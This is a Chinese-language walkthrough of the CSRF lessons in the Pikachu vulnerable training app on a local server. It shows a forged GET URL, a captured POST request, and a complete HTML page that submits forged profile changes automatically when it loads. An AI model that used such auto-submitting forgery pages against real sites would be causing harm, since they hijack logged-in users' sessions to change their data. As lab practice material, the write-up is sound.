pikachu-CSRF
1.CSRF(GET)
? 修改用户信息,使用burp抓包,伪造提交的地址
# 数据包
GET /pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=boy&phonenum=15988767673&add=dsfsf&email=kobe%40pikachu.com1&submit=submit
# 伪造地址
http://192.168.1.150/pikachu-labs/vul/csrf/csrfget/csrf_get_edit.php?sex=1&phonenum=1&add=1&email=1&submit=submit
? 用户在登陆的情况下,发送伪造的地址请求
2.CSRF(POST)
?
? 使用burp伪造post数据包,并生成html页面
POST /pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php HTTP/1.1
Host: 192.168.1.150
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: http://192.168.1.150
Connection: close
Referer: http://192.168.1.150/pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php
Cookie: PHPSESSID=2n5mcduhjf22v7cvn0sljclhk4
Upgrade-Insecure-Requests: 1
sex=2222&phonenum=2222&add=2222&email=2222&submit=submit
# csrf_post.html
<!DOCTYPE html>
<html>
<head lang="en">
<title>csrf_post</title>
<script>
window.onload = function() {
document.getElementById("postsubmit").click();
}
</script>
</head>
<body>
<form action="http://192.168.1.150/pikachu-labs/vul/csrf/csrfpost/csrf_post_edit.php" method="POST">
<input type="text" name="sex" value="2222"><br>
<input type="hidden" name="phonenum" value="2222"><br>
<input type="hidden" name="add" value="2222"><br>
<input type="hidden" name="email" value="2222"><br>
<input id="postsubmit" type="submit" name="submit" value="submit" />
</form>
</body>
</html>
? 用户在登陆的情况下,访问构造的csrf_post.html页面http://192.168.1.1/csrf_post.html(phpstudy搭建的)
